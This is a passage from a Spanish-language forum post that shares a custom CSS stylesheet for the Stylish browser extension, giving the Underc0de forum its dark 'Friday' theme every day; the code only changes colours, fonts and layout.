La solución para esto sería simplemente no mostrar un mensaje con el correo o en su defecto mostrarlo pero con algún tipo de sensura.

Eso ha sido todo por hoy, cualquier duda pueden comentar.

Saludos a todos!
#13
Front-end / Cambia el tema de Underc0de!
Mayo 13, 2017, 04:41:43 AM
Muy buenas!

Personalmente me gusta mucho como se ve el tema dark de Underc0de los viernes, me parecía una lástima poder disfrutarlo sólo un día así que decidí cambiarlo  ;D

Tendrán que descargar Stylish una extensión que permite modificar el estilo de muchas páginas web, lo pueden hacer desde aquí para Mozilla: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Una vez instalado, instalan el tema 'dark' de underc0de No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



Luego activan el tema desde la extensión.


¡Y LISTO! Ya tendrán el tema del viernes, todos los días.


Adjunto el código css que utilicé por si alguien quiere cambiar alguna cosa, o crear su propio estilo.

Código: css
@-moz-document url-prefix('https://underc0de.org/'){

/* Styles for the general looks for the Curve theme.
------------------------------------------------------- */
/* Normal, standard links. */
a:link, a:visited
{
color: #F5DA81;
text-decoration: none;
}
a:hover
{
text-decoration: underline;
cursor: cursor;
color: #FF8000;

}

/* Links that open in a new window. */
a.new_win:link, a.new_win:visited
{
text-decoration: none;
}
a.new_win:hover
{
text-decoration: underline;
}

/* Tables should show empty cells. */
table
{
empty-cells: show;
}

/* Set a fontsize that will look the same in all browsers. */
body
{
font: 13px/150% "Consolas", "Arial", "Helvetica", sans-serif;
margin: 0 auto;
padding: 0;
}

/* Help popups require a different styling of the body element. */
body#help_popup
{
padding: 1em;
}

/* use dark grey for the text, leaving #000 for headers etc */
body, td, th, tr
{
color: #bbb;
}

/* This division wraps the entire forum when a forum width is set. */
.wrapper
{
width: 95%;
margin: 0 auto;
}

/* lets give all forms zero padding/margins */
form
{
padding: 0;
margin: 0;
}

/* We can style the different types of input buttons to be uniform throughout different browsers and their color themes.
.button_submit - covers input[type=submit], input[type=button], button[type=submit] and button[type=button] in all browsers
.button_reset  - covers input[type=reset] and button[type=reset] throughout all browsers
.input_check   - covers input[type=checkbox] throughout all browsers
.input_radio   - covers input[type=radio] throughout all browsers
.input_text    - covers input[type=text] throughout all browsers
.input_file    - covers input[type=file] throughout all browsers
*/

input, button, select, textarea
{
font: 95%/115% verdana, Helvetica, sans-serif;
color: #000;
background: #fff;
border: 1px solid #7f9db9;
padding: 2px;
}

/* Select elements look horrible with the extra padding, so leave them unpadded. */
select
{
padding: 0;
}

/* Add some padding to the options instead. */
select option
{
padding: 1px;
}

/* The font size of textareas should be just a little bit larger. */
textarea
{
font: 100%/130% verdana, Helvetica, sans-serif;
}

/* Buttons should be styled a bit differently, in order to make them look more button'ish. */
.button_submit, .button_reset
{
background: #cde7ff url(https://underc0de.org/foro/Themes/underc0de/images/theme/submit_bg.png) no-repeat;
border: 1px solid #202020;
cursor: pointer;
font-weight: normal;
}
input:hover, textarea:hover, button:hover, select:hover
{
border: 1px solid #454545;
}
.button_submit:hover, .button_reset:hover
{
border: 1px solid #202020;
background: url(https://underc0de.org/foro/Themes/underc0de/images/theme/submit_bg.png) no-repeat 0 -140px #cde7ff;
}
input:focus, textarea:focus, button:focus, select:focus
{
border: 1px solid #454545;
}

/* All input elements that are checkboxes or radio buttons shouldn't have a border around them. */
input.input_check, input.input_radio
{
border: none;
background: none;
}
h3.catbg input.input_check
{
margin: 9px 7px 0 7px;
}

/* Give disabled text input elements a different background color. */
input[disabled].input_text
{
background-color: #eee;
}

/* Standard horizontal rule.. ([hr], etc.) */
hr, .hrcolor
{
height: 1px;
border: 0;
color: #494949;
background-color: #494949;
}

/* By default set the color on these tags as #000. */
h1, h2, h3, h4, h5, h6
{
color: #fff;
font-size: 1em;
margin: 0;
padding: 0;
}

/* Fieldsets are used to group elements. */
fieldset
{
border: 1px solid #c4c4c4;
padding: 1em;
margin: 0 0 0.5em 0;
}
fieldset legend
{
font-weight: bold;
color: #444;
}
/* No image should have a border when linked. */
a img
{
border: 0;
}

/* Define strong as bold, and em as italics */
strong
{
font-weight: bold;
}

em
{
font-style: italic;
}
/* Alternative for u tag */
.underline
{
text-decoration: underline;
}

/* Common classes to easy styling.
------------------------------------------------------- */

.floatright
{
float: right;
}
.floatleft
{
float: left;
}

.flow_auto
{
overflow: auto;
}
.flow_hidden
{
overflow: hidden;
}
.flow_hidden .windowbg, .flow_hidden .windowbg2
{
margin-top: 2px;
}
.clear
{
clear: both;
}
.clear_left
{
clear: left;
}
.clear_right
{
clear: right;
}

/* Default font sizes: small (8pt), normal (10pt), and large (14pt). */
.smalltext, tr.smalltext th
{
font-size: 11px;
}
.middletext
{
font-size: 11px;
line-height: 1em;
}
.normaltext
{
font-size: 16px;
line-height: 1.2em;
}
.largetext
{
font-size: 18px;
}
.centertext
{
margin: 0 auto;
text-align: center;
}
.righttext
{
margin-left: auto;
margin-right: 0;
text-align: right;
}
.lefttext
{
margin-left: 0;
margin-right: auto;
text-align: left;
}
.double_height
{
line-height: 2em;
}
/* some common padding styles */
.padding
{
padding: 0.7em;
}
.main_section, .lower_padding
{
padding-bottom: 0.5em;
}
/* a quick reset list class. */
ul.reset, ul.reset li
{
padding: 0;
margin: 0;
list-style: none;
}

/* Some BBC related styles.
------------------------------------------------------- */

/* A quote, perhaps from another post. */
blockquote.bbc_standard_quote, blockquote.bbc_alternate_quote
{
font-size: 11px;
color: #fff;
line-height: 1.4em;
background: url(https://underc0de.org/foro/Themes/underc0de/images/theme/quote.png) 0.1em 0.1em no-repeat;
border-left: 8px solid #666;
padding: 1.1em 1.4em;
margin: 0.1em 0 0.3em 0;
overflow: auto;
}

/* Alterate blockquote stylings */
blockquote.bbc_standard_quote
{
background-color: #484848;
}
blockquote.bbc_alternate_quote
{
background-color: #383838;
border-left: 8px solid #585858;
}

/* A code block - maybe PHP ;). */
code.bbc_code
{
display: block;
font-family: "dejavu sans mono", "monaco", "lucida console", "courier new", monospace;
font-size: x-small;
background: #414141;
border-top: 4px solid #555;
border-bottom: 4px solid #555;
line-height: 1.5em;
padding: 3px 1em;
overflow: auto;
white-space: nowrap;
/* Show a scrollbar after about 24 lines. */
max-height: 24em;
}

/* The "Quote:" and "Code:" header parts... */
.codeheader, .quoteheader
{
color: #ddd;
font-size: 11px;
font-weight: bold;
padding: 0 0.3em;
}

/* For links to change the code stuff... */
.codeoperation
{
font-weight: normal;
}

/* Styling for BBC tags */
.bbc_link:link, .bbc_link:visited
{
}
.bbc_link:hover
{
}
.bbc_size
{
line-height: 1.4em;
}
.bbc_color a
{
color: inherit;
}
.bbc_img
{
border: 0;
}
.bbc_table
{
font: inherit;
color: inherit;
}
.bbc_table td
{
font: inherit;
color: inherit;
vertical-align: top;
}
.bbc_u
{
text-decoration: underline;
}
.bbc_list
{
text-align: left;
}
.bbc_tt
{
font-family: "dejavu sans mono", "monaco", "lucida console", "courier new", monospace;
}

/* Generally, those [?] icons.  This makes your cursor a help icon. */
.help
{
cursor: help;
}

/* /me uses this a lot. (emote, try typing /me in a post.) */
.meaction
{
color: red;
}

/* Highlighted text - such as search results. */
.highlight
{
font-weight: bold;
color: #ff7200 !important;
font-size: 1.1em;
}

/* A more discreet highlight color, for selected membergroups etc. */
.highlight2
{
background-color: #D1E1EF;
color: #000 !important;
}

/* Generic, mostly color-related, classes.
------------------------------------------------------- */

.titlebg, .titlebg2, tr.titlebg th, tr.titlebg td, tr.titlebg2 td
{
color: #fff;
font-size: 1.1em;
font-weight: bold;
background: url(https://underc0de.org/foro/Themes/underc0de/images/theme/main_block.png) no-repeat -10px -208px;
}
.catbg, .catbg2, tr.catbg td, tr.catbg2 td, tr.catbg th, tr.catbg2 th
{
color: #cdcdcd;
font-size: 1.1em;
font-weight: bold;
background: url(https://underc0de.org/foro/Themes/underc0de/images/theme/main_block.png) no-repeat -10px -164px;
}

/* adjust the table versions of headers */
tr.titlebg th, tr.titlebg2 th, td.titlebg, td.titlebg2, tr.catbg th, tr.catbg2 th, td.catbg, td.catbg2
{
padding: 0 6px;
}
tr.titlebg th a:link, tr.titlebg th a:visited, tr.titlebg2 td a:link, tr.titlebg2 td a:visited
{
color: #fff;
}
tr.catbg th a:link, tr.catbg th a:visited, tr.catbg2 td a:link, tr.catbg2 td a:visited
{
color: #cdcdcd;
}
.catbg select
{
height: 1.5em;
font-size: 0.85em;
}

/* Alternating backgrounds for posts, and several other sections of the forum. */
.windowbg, #preview_body
{
background-color: #282828;
}
.windowbg2
{
background-color: #323232;
}
.windowbg3
{
background-color: #2d2d2d;
}

/* the page navigation area */
.pagesection
{
font-size: 0.9em;
padding: 0.2em;
overflow: hidden;
margin-bottom: 1px;
}
div.pagesection div.floatright input
{
margin-top: 3px;
}

.pagelinks
{
padding: 0.6em 0 0.4em 0;
}

/* Colors for background of posts requiring approval */
.approvebg
{
background-color: #363636;
}
.approvebg2
{
background-color: #393939;
}

/* Color for background of *topics* requiring approval */
.approvetbg
{
background-color: #282828;
}
.approvetbg2
{
background-color: #414141;
}

/* Sticky topics get a different background */
.stickybg
{
background: #272727;
color: #999;
}
.stickybg2
{
background: #292929;
color: #999;
}

/* Locked posts get a different shade, too! */
.lockedbg
{
background: #272727;
font-style: italic;
color: #666;
}
.lockedbg2
{
background: #272727;
font-style: italic;
color: #666;
}

/* Posts and personal messages displayed throughout the forum. */
.post, .personalmessage
{
overflow: auto;
line-height: 1.4em;
padding: 0.1em 0;
}

/* All the signatures used in the forum.  If your forum users use Mozilla, Opera, or Safari, you might add max-height here ;). */
.signature, .attachments
{
width: 98%;
overflow: auto;
clear: right;
padding: 1em 0 3px 0;
border-top: 1px solid #494949;
line-height: 1.4em;
font-size: 0.85em;
}
.custom_fields_above_signature
{
width: 98%;
clear: right;
padding: 1em 0 3px 0;
border-top: 1px solid #494949;
line-height: 1.4em;
font-size: 0.85em;
}

/* Sometimes there will be an error when you post */
.error
{
color: red;
}

/* Messages that somehow need to attract the attention. */
.alert
{
color: red;
}

/* Calendar colors for birthdays, events and holidays */
.birthday
{
color: #920ac4;
}

.event
{
color: #078907;
}

.holiday
{
color: #688eb3;
}

/* Colors for warnings */
.warn_mute
{
color: red;
}

.warn_moderate
{
color: #ffa500;
}

.warn_watch, .success
{
color: green;
}

a.moderation_link, a.moderation_link:visited
{
color: red;
font-weight: bold;
}

.openid_login
{
background: white url(https://underc0de.org/foro/Themes/underc0de/images/openid.gif) no-repeat;
padding-left: 18px;
}

/* a descriptive style */
.description, .description_board, .plainbox
{
padding: 1em;
font-size: 0.9em;
line-height: 1.4em;
border: 1px solid #222;
background: #454545;
margin: 0.2em 1px 1em 1px;
color: #eee;
}
.description_board
{
margin: 1em 1px 0 1px;
}

/* an informative style */
.information
{
padding: 0.5em 1em;
font-size: 0.9em;
line-height: 1.3em;
border: 1px solid #774362;
background: #633752;
margin: 0.2em 1px 1em 1px;
}
.information p
{
padding: 1em;
margin: 0;
}
p.para2
{
padding: 1em 0 3.5em 0;
margin: 0;
}
/* AJAX notification bar
------------------------------------------------------- */
#ajax_in_progress
{
background: url(https://underc0de.org/foro/Themes/underc0de/images/theme/loadingbar.png) repeat-x;
color: #f96f00;
text-align: center;
font-size: 16pt;
padding: 8px;
width: 100%;
height: 66px;
line-height: 25px;
position: fixed;
top: 0;
left: 0;
}

#ajax_in_progress a
{
color: orange;
text-decoration: underline;
font-size: smaller;
float: right;
margin-right: 20px;
}

/* Lists with settings use these a lot.
------------------------------------------------------- */
dl.settings
{
clear: right;
overflow: auto;
margin: 0 0 10px 0;
padding: 0;
}
dl.settings dt
{
width: 40%;
float: left;
margin: 0 0 10px 0;
padding: 0;
clear: both;
}
dl.settings dt.settings_title
{
width: 100%;
float: none;
margin: 0 0 10px 0;
padding: 5px 0 0 0;
font-weight: bold;
clear: both;
}
dl.settings dt.windowbg
{
width: 98%;
float: left;
margin: 0 0 3px 0;
padding: 0 0 5px 0;
clear: both;
}
dl.settings dd
{
width: 56%;
float: right;
margin: 0 0 3px 0;
padding: 0;
}
dl.settings img
{
margin: 0 10px 0 0;
}
/* help icons */
dl.settings dt a img
{
position: relative;
top: 2px;
}

/* Styles for rounded headers.
------------------------------------------------------- */
h3.catbg, h3.catbg2, h3.titlebg, h4.titlebg, h4.catbg
{
overflow: hidden;
height: 38px;
line-height: 38px;
font-size: 1.2em;
font-weight: normal;
}
h3.catbg a:link, h3.catbg a:visited, h4.catbg a:link, h4.catbg a:visited, h3.catbg, .table_list tbody.header td, .table_list tbody.header td a
{
color: #cdcdcd;
}
h3.catbg2 a, h3.catbg2
{
color: #cdcdcd;
}
h3.catbg a:hover, h4.catbg a:hover, .table_list tbody.header td a:hover
{
}
h3.catbg2 a:hover
{
color: #fff;
text-decoration: none;
}
h3.titlebg a, h3.titlebg, h4.titlebg, h4.titlebg a
{
color: #fff;
}
h3.titlebg a:hover, h4.titlebg a:hover
{
}
h3.catbg img.icon, h4.titlebg img.icon
{
vertical-align: middle;
margin: -2px 5px 0 0;
}
h4.catbg a.toggle img
{
vertical-align: middle;
margin: -2px 5px 0 5px;
}
h4.catbg, h4.catbg2 , h3.catbg , h3.catbg2 , .table_list tbody.header td.catbg
{
background: #000000;
padding-right: 9px;
}
h4.titlebg, h3.titlebg
{
background: url(https://underc0de.org/foro/Themes/underc0de/images/theme/main_block.png) no-repeat 100% -208px;
padding-right: 9px;
}
h4.titlebg img.icon
{
float: left;
margin: 9px 8px 0 0;
}
div.cat_bar
{
background: #000000;
padding-left: 9px;
height: 38px;
overflow: hidden;
margin-bottom: 1px;
}
div.title_bar
{
background: url(https://underc0de.org/foro/Themes/underc0de/images/theme/main_block.png) no-repeat 0 -208px;
padding-left: 9px;
height: 38px;
overflow: hidden;
margin-bottom: 1px;
}

/* rounded bars needs a different background here */

div.roundframe div.cat_bar
{
background: url(https://underc0de.org/foro/Themes/underc0de/images/theme/main_block.png) no-repeat 0 -252px;
margin-bottom: 0;
}
div.roundframe div.cat_bar h3.catbg
{
background: url(https://underc0de.org/foro/Themes/underc0de/images/theme/main_block.png) no-repeat 100% -252px;
}
div.title_barIC
{
background: url(https://underc0de.org/foro/Themes/underc0de/images/theme/main_block.png) no-repeat 0 -120px;
padding-left: 9px;
height: 38px;
overflow: hidden;
margin-bottom: 1px;
}
div.title_barIC h4.titlebg
{
background: url(https://underc0de.org/foro/Themes/underc0de/images/theme/main_block.png) no-repeat 100% -120px;
}
#upshrinkHeaderIC p.pminfo
{
margin: 0;
padding: 0.5em;
}
img#upshrink_ic, img#newsupshrink
{
float: right;
margin: 12px 5px 0 0;
}
table.table_list a.unreadlink, table.table_list a.collapse
{
float: right;
}
table.table_list a.collapse
{
margin: 12px 5px 0 1em;
height: 31px;
line-height: 31px;
}

/* The half-round header bars for some tables. */
.table_grid tr.catbg, .table_grid tr.titlebg
{
font-size: 0.95em;
border-bottom: 1px solid #252525;
}
.table_grid tr.catbg th, .table_grid tr.titlebg th
{
height: 38px;
line-height: 38px;
}
tr.catbg th.first_th
{
background: url(https://underc0de.org/foro/Themes/underc0de/images/theme/main_block.png) no-repeat 0 -164px;
}
tr.catbg th.last_th
{
background: url(https://underc0de.org/foro/Themes/underc0de/images/theme/main_block.png) no-repeat 100% -164px;
}
tr.titlebg th.first_th
{
background: url(https://underc0de.org/foro/Themes/underc0de/images/theme/main_block.png) no-repeat 0 -208px;
}
tr.titlebg th.last_th
{
background: url(https://underc0de.org/foro/Themes/underc0de/images/theme/main_block.png) no-repeat 100% -208px;
}
.table_grid th.last_th input
{
margin: 0 2px;
}
.table_grid th.lefttext
{
padding: 0 0.7em;
}

/* a general table class */
table.table_grid
{
border-collapse: collapse;
margin-top: 0.1em;
}
table.table_grid td
{
padding: 8px;
border-bottom: 1px solid #252525;
border-right: 1px solid #252525;
}

/* GenericList */
.additional_row
{
padding: 0.5em 0 0.5em 0;
}
table.table_grid thead tr.catbg th
{
white-space: nowrap;
}

/* table_grid styles for Profile > Show Permissions. */
#permissions table.table_grid  td
{
padding: 0.4em 0.8em;
cursor: default;
}

/* Common styles used to add corners to divisions.
------------------------------------------------------- */
.windowbg span.topslice
{
display: block;
padding-left: 20px;
background: url(https://underc0de.org/foro/Themes/underc0de/images/theme/main_block.png) 0 -30px no-repeat;
}
.windowbg span.topslice span
{
display: block;
background: url(https://underc0de.org/foro/Themes/underc0de/images/theme/main_block.png) 100% -30px no-repeat;
height: 11px;
}
.windowbg span.botslice
{
display: block;
padding-left: 20px;
background: url(https://underc0de.org/foro/Themes/underc0de/images/theme/main_block.png) 0 -40px no-repeat;
font-size: 5px;
line-height: 5px;
margin-bottom: 0.2em;
}
.windowbg span.botslice span
{
display: block;
background: url(https://underc0de.org/foro/Themes/underc0de/images/theme/main_block.png) 100% -40px no-repeat;
height: 11px;
}

.windowbg2 span.topslice
{
display: block;
padding-left: 20px;
background: url(https://underc0de.org/foro/Themes/underc0de/images/theme/main_block.png) 0 -60px no-repeat;
}
.windowbg2 span.topslice span
{
display: block;
background: url(https://underc0de.org/foro/Themes/underc0de/images/theme/main_block.png) 100% -60px no-repeat;
height: 11px;
}
.windowbg2 span.botslice
{
display: block;
padding-left: 20px;
background: url(https://underc0de.org/foro/Themes/underc0de/images/theme/main_block.png) 0 -71px no-repeat;
font-size: 5px;
line-height: 5px;
margin-bottom: 0.2em;
}
.windowbg2 span.botslice span
{
display: block;
background: url(https://underc0de.org/foro/Themes/underc0de/images/theme/main_block.png) 100% -71px no-repeat;
height: 11px;
}
.approvebg span.topslice
{
display: block;
padding-left: 20px;
background: url(https://underc0de.org/foro/Themes/underc0de/images/theme/main_block.png) 0 0 no-repeat;
}
.approvebg span.topslice span
{
display: block;
background: url(https://underc0de.org/foro/Themes/underc0de/images/theme/main_block.png) 100% 0 no-repeat;
height: 11px;
}
.approvebg span.botslice
{
display: block;
padding-left: 20px;
background: url(https://underc0de.org/foro/Themes/underc0de/images/theme/main_block.png) 0 -11px no-repeat;
margin-bottom: 0.2em;
}
.approvebg span.botslice span
{
display: block;
background: url(https://underc0de.org/foro/Themes/underc0de/images/theme/main_block.png) 100% -11px no-repeat;
height: 11px;
}
.postbg
{
border-left: 1px solid #7f7f7f;
border-right: 1px solid #7f7f7f;
}

/* Used for sections that need somewhat larger corners.
----------------------------------------------------------- */
.roundframe
{
padding: 0 10px;
background: #111111;
border-left: 1px solid #202020;
border-right: 1px solid #202020;
}
.roundframe dl, .roundframe dt, .roundframe p
{
margin: 0;
}
.roundframe p
{
padding: 0.5em;
}
span.upperframe
{
padding: 0;
display: block;
background: #111111;
padding-left: 20px;
}
span.upperframe span
{
padding: 0;
height: 12px;
display: block;
background: #111111;
}
span.lowerframe
{
padding: 0;
display: block;
background: #111111;
padding-left: 20px;
}
span.lowerframe span
{
padding: 0;
height: 12px;
display: block;
background: #111111;
}

/* The main content area.
------------------------------------------------------- */
.content
{
padding: 0.5em 1.2em;
margin: 0;
border: none;
}
.content p
{
margin: 0 0 0.5em 0;
}

/* Styles used by the auto suggest control.
------------------------------------------------------- */
.auto_suggest_div
{
border: 1px solid #000;
position: absolute;
visibility: hidden;
}
.auto_suggest_item
{
background-color: #ddd;
}
.auto_suggest_item_hover
{
background-color: #888;
cursor: pointer;
color: #eee;
}

/* Styles for the standard dropdown menus.
------------------------------------------------------- */
#main_menu
{
padding: 0 0.5em;
float: left;
margin: 0;
width: 98%;
}

.dropmenu, .dropmenu ul
{
list-style: none;
line-height: 1em;
padding: 0;
margin: 0;
}
.dropmenu
{
padding: 0 0.5em;
}
.dropmenu a
{
display: block;
color: #999;
text-decoration: none;
text-transform: uppercase;
}
.dropmenu a span
{
display: block;
padding: 0 0 0 5px;
font-size: 0.85em;
}
/* the background's first level only */
.dropmenu li a.firstlevel
{
margin-right: 8px;
}
.dropmenu li a.firstlevel span.firstlevel
{
display: block;
position: relative;
left: -5px;
padding-left: 5px;
height: 22px;
line-height: 20px;
white-space: pre;
}
.dropmenu li
{
float: left;
padding: 0;
margin: 0;
position: relative;
}
.dropmenu li ul
{
z-index: 90;
display: none;
position: absolute;
width: 19.2em;
font-weight: normal;
border-bottom: 1px solid #404040;
background: url(https://underc0de.org/foro/Themes/underc0de/images/theme/menu_gfx.png) 0 -130px no-repeat;
padding: 7px 0 0 0;
}
.dropmenu li li
{
width: 19em;
margin: 0;
border-left: 1px solid #404040;
border-right: 1px solid #404040;
}
.dropmenu li li a span
{
display: block;
padding: 8px;
}
.dropmenu li ul ul
{
margin: -1.8em 0 0 13em;
}

/* the active button */
.dropmenu li a.active
{
background: url(https://underc0de.org/foro/Themes/underc0de/images/theme/menu_gfx.png) no-repeat 100% 0;
color: #252525;
font-weight: bold;
}
.dropmenu li a.active span.firstlevel
{
background: url(https://underc0de.org/foro/Themes/underc0de/images/theme/menu_gfx.png) no-repeat 0 0;
}
/* the hover effects */
.dropmenu li a.firstlevel:hover, .dropmenu li:hover a.firstlevel
{
background: url(https://underc0de.org/foro/Themes/underc0de/images/theme/menu_gfx.png) no-repeat 100% -30px;
color: #fff;
cursor: pointer;
text-decoration: none;
}
.dropmenu li a.firstlevel:hover span.firstlevel, .dropmenu li:hover a.firstlevel span.firstlevel
{
background: url(https://underc0de.org/foro/Themes/underc0de/images/theme/menu_gfx.png) no-repeat 0 -30px;
}
/* the hover effects on level2 and 3 */
.dropmenu li li a:hover, .dropmenu li li:hover>a
{
background: #363636;
color: #fff;
text-decoration: none;
}
.dropmenu li:hover ul ul, .dropmenu li:hover ul ul ul
{
top: -999em;
}
.dropmenu li li:hover ul
{
top: auto;
}
.dropmenu li:hover ul
{
display: block;
}
.dropmenu li li.additional_items
{
background-color: #303030;
}

/* The dropdown menu toggle image */
#menu_toggle
{
float: right;
margin-right: 10px;
padding-top: 3px;
}
#menu_toggle span
{
position: relative;
right: 5000px;
}

/* Styles for the standard button lists.
------------------------------------------------------- */

.buttonlist ul
{
z-index: 100;
padding: 5px;
margin: 0 0.2em 5px 0;
}
.buttonlist ul li
{
margin: 0;
padding: 0;
list-style: none;
float: left;
}
.buttonlist ul li a
{
display: block;
font-size: 11px;
color: #fff;
background: #e8e8e8 url(https://underc0de.org/foro/Themes/underc0de/images/theme/menu_gfx.png) no-repeat 0 -60px;
padding: 0 0 0 8px;
margin-left: 2px;
text-transform: uppercase;
cursor: pointer;
}
.buttonlist ul li a.button_strip_bookmark
{
display: block;
font-size: 11px;
color: #fff;
background: #0074cd;
padding: 0 0 0 8px;
margin-left: 2px;
text-transform: uppercase;
cursor: pointer;
}
.buttonlist ul li a.button_strip_bookmark span
{
background: #0074cd;
display: block;
height: 19px;
line-height: 19px;
padding: 0 8px 0 0;
}
.buttonlist ul li a:hover
{
background: url(https://underc0de.org/foro/Themes/underc0de/images/theme/menu_gfx.png) no-repeat 0 0;
color: #444;
text-decoration: none;
}
.buttonlist ul li a span
{
background: url(https://underc0de.org/foro/Themes/underc0de/images/theme/menu_gfx.png) no-repeat 100% -60px;
display: block;
height: 19px;
line-height: 19px;
padding: 0 8px 0 0;
}
.buttonlist ul li a:hover span
{
background: #fff url(https://underc0de.org/foro/Themes/underc0de/images/theme/menu_gfx.png) no-repeat 100% 0;
}
/* the active one */
.buttonlist ul li a.active
{
background: #5a6c85 url(https://underc0de.org/foro/Themes/underc0de/images/theme/menu_gfx.png) no-repeat 0 -90px;
color: #fff;
font-weight: bold;
}
.buttonlist ul li a.active span
{
background: url(https://underc0de.org/foro/Themes/underc0de/images/theme/menu_gfx.png) no-repeat 100% -90px;
}
.buttonlist ul li a.active
{
font-weight: bold;
}
.buttonlist ul li a.active:hover
{
color: #252525;
}
.align_top ul li a, .align_bottom ul li a
{
margin: 0 12px 0 0;
}

/* the navigation list */
ul#navigation
{
margin: 0;
font-size: 0.9em;
padding: 1em 0.4em;
}
ul#navigation li
{
float: none;
font-size: 0.95em;
display: inline;
}

#adm_submenus
{
padding-left: 2em;
overflow: hidden;
}

h3, h4
{
padding-bottom: 3px;
}

/* The navigation list (i.e. linktree) */
.navigate_section
{
padding: 0.5em;
margin: 0 0 0 0;
}
.navigate_section ul
{
display: block;
margin: 0;
font-size: 0.9em;
padding: 0.5em 0;
overflow: hidden;
list-style: none;
clear: both;
width: 100%;
}
.navigate_section ul li
{
float: left;
padding: 0 0.5em 0 0;
font-size: 0.95em;
}
.navigate_section ul li a
{
white-space: pre;
}
select.qaction, input.qaction
{
font-size: 0.85em;
padding: 0;
}
#mlist table tbody td.windowbg2
{
text-align: center;
}

/* Styles for a typical table.
------------------------------------------------------- */
table.table_list
{
width: 100%;
}
table.table_list p
{
padding: 0;
margin: 0;
}
table.table_list td, table.table_list th
{
padding: 5px;
}
table.table_list tbody.header td
{
padding: 0;
}
table.table_list tbody.content td.stats
{
font-size: 11px;
width: 15%;
text-align: left;
}
table.table_list tbody.content td.lastpost
{
font-size: 11px;
width: 26%;
text-align: right;
}
table.table_list tbody.content td.icon
{
text-align: center;
width: 6%;
}

/* Styles for the board index.
------------------------------------------------- */

/* the board title! */
.table_list tbody.content td.info a.subject
{
font-weight: bold;
font-size: 110%;
color: #fff;
}
.table_list tbody.content td.children
{
color: #555;
font-size: 85%;
background-color: #111111;
}
p.moderators
{
font-size: 0.8em;
font-family: verdana, sans-serif;
}
/* hide the table header/footer parts - but its here for those needing to style it */
#boardindex_table .table_list thead, #boardindex_table .table_list tfoot
{
display: none;
}

/* the posting icons */
#posting_icons
{
padding: 0 1em 0.5em 1em;
margin: 0 0 1em 0;
line-height: 1em;
}
#posting_icons ul
{
font-size: 0.8em;
}
#posting_icons img
{
vertical-align: middle;
margin: 0 0 0 4ex;
}
#postbuttons_upper ul li a span
{
line-height: 19px;
padding: 0 0 0 6px;
}
.nextlinks
{
text-align: right;
margin-top: -1px;
}
.nextlinks_bottom
{
clear: right;
text-align: right;
}
.mark_read
{
padding: 0 0.5em;
}

/* the newsfader */
#newsfader
{
margin: 0 2px;
}
#smfFadeScroller
{
text-align: center;
padding: 0 2em;
overflow: auto;
margin: 1em 0;
color: #575757; /* shouldn't be shorthand style due to a JS bug in IE! */
}

/* Styles for the info center on the board index.
---------------------------------------------------- */

#upshrinkHeaderIC
{
margin-top: 4px;
}
dl#ic_recentposts
{
margin: 0 0 0.5em 0;
padding: 0.5em;
line-height: 1.3em;
}
dl#ic_recentposts dt
{
float: left;
}
dl#ic_recentposts dd
{
text-align: right;
}
#upshrinkHeaderIC p
{
margin: 0 0 0.5em 0;
padding: 0.5em;
}
#upshrinkHeaderIC p.last
{
margin: 0;
padding: 0.5em;
border-top: 2px dotted #777;
}
#upshrinkHeaderIC p.inline
{
border: none;
margin: 0;
padding: 0.2em 0.5em 0.2em 0.5em;
}
#upshrinkHeaderIC p.stats
{
font-size: 1.1em;
padding-top: 8px;
}
form#ic_login
{
padding: 0.5em;
height: 2em;
}
form#ic_login ul li
{
margin: 0;
padding: 0;
float: left;
width: 20%;
text-align: center;
}
form#ic_login ul li label
{
display: block;
}

/* the small stats */
#index_common_stats
{
display: block;
margin: 0 0 0.5em 0;
text-align: right;
font-size: 0.9em;
position: relative;
top: -20px;
line-height: 1px;
}

img.new_posts
{
padding: 0 0.1em;
}
/* Styles for the message (topic) index.
---------------------------------------------------- */
div.table_frame .table_list
{
border-collapse: collapse;
margin: 2px 0;
}
.table_frame .table_list td.icon, .table_frame .table_list td.info, .table_frame .table_list td.stats
{
border-right: 2px solid #252525;
}
#messageindex
{
clear: both;
}
/* the page navigation area */
.childboards
{
margin-bottom: 0.2em;
}
#childboards h3
{
padding-bottom: 0;
}
#childboards .table_list thead
{
display: none;
}
#childboards .table_list
{
margin-bottom: 1em;
}
.lastpost img
{
padding: 0 0 0 5px;
}

/* Styles for the display template (topic view).
---------------------------------------------------- */

#postbuttons div.buttons
{
padding: 0.5em;
width: 40%;
float: right;
}
#postbuttons div.middletext
{
width: 60%;
}
#postbuttons span
{
display: block;
text-align: right;
}
#postbuttons span.lower
{
clear: right;
}
#postbuttons .buttonlist
{
float: right;
}
#postbuttons #pagelinks
{
padding-top: 1em;
}
#moderationbuttons
{
overflow: hidden;
}
/* Events */
.linked_events
{
padding: 1em 0;
}
.edit_event
{
margin: 0 1em;
vertical-align: middle;
}
/* Poll question */
#poll
{
overflow: hidden;
}
#poll .content
{
padding: 0 1em;
}
h4#pollquestion
{
padding: 0 0 0.5em 2em;
}

/* Poll vote options */
#poll_options ul.options
{
border-top: 1px solid #494949;
padding: 1em 2.5em 0 2em;
margin: 0 0 1em 0;
}
#poll_options div.submitbutton
{
border-bottom: 1px solid #494949;
clear: both;
padding: 0 0 1em 2em;
margin: 0 0 1em 0;
}

/* Poll results */
#poll_options dl.options
{
border: solid #494949;
border-width: 1px 0;
padding: 1em 2.5em 1em 2em;
margin: 0 1em 1em 0;
line-height: 1.1em !important;
}

#poll_options dl.options dt
{
padding: 0.3em 0;
width: 30%;
float: left;
margin: 0;
clear: left;
}

#poll_options dl.options .voted
{
font-weight: bold;
}

#poll_options dl.options dd
{
margin: 0 0 0 2em;
padding: 0.1em 0 0 0;
width: 60%;
max-width: 450px;
float: left;
}

#poll_options dl.options .percentage
{
display: block;
float: right;
padding: 0.2em 0 0.3em 0;
}

/* Poll notices */
#poll_options p
{
margin: 0 1.5em 0.2em 1.5em;
padding: 0 0.5em 0.5em 0.5em;
}

div#pollmoderation
{
margin: 0;
padding: 0;
overflow: auto;
}

/* onto the posts */
#forumposts
{
clear: both;
}
#forumposts .cat_bar
{
margin: 0 0 2px 0;
}
/* author and topic information */
#forumposts h3 span#author
{
margin: 0 7.7em 0 0;
}
#forumposts h3 img
{
float: left;
margin: 4px 0.5em 0 0;
}
#forumposts h3.catbg
{
margin-bottom: 3px;
}
p#whoisviewing
{
margin: 0;
padding: 0.5em;
}
/* poster and postarea + moderation area underneath */
.post_wrapper
{
float:left;
width:100%;
}
.poster
{
float: left;
width: 15em;
